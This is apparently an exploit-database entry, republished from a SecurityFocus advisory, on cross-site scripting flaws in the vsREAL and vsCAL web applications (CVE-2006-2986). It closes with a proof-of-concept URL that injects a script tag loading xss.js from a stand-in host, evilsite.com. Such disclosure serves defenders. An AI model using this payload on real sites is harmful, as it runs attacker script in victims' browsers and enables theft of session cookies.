Baby Katie Media VSReal and VScal 1.0 - 'index.php?lid' Cross-Site Scripting



EKU-ID: 33252 CVE: CVE-2006-2986;OSVDB-26330 OSVDB-ID:
Author: Luny Published: 2006-06-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/18350/info

vsREAL and vSCAL are prone to multiple cross-site scripting vulnerabilities. These issues are due to the applications' failure to properly sanitize user-supplied input.

An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/vscal/index.php?page=showlisting&lid=<SCRIPT%20SRC=evilsite.com//xss.js></SCRIPT>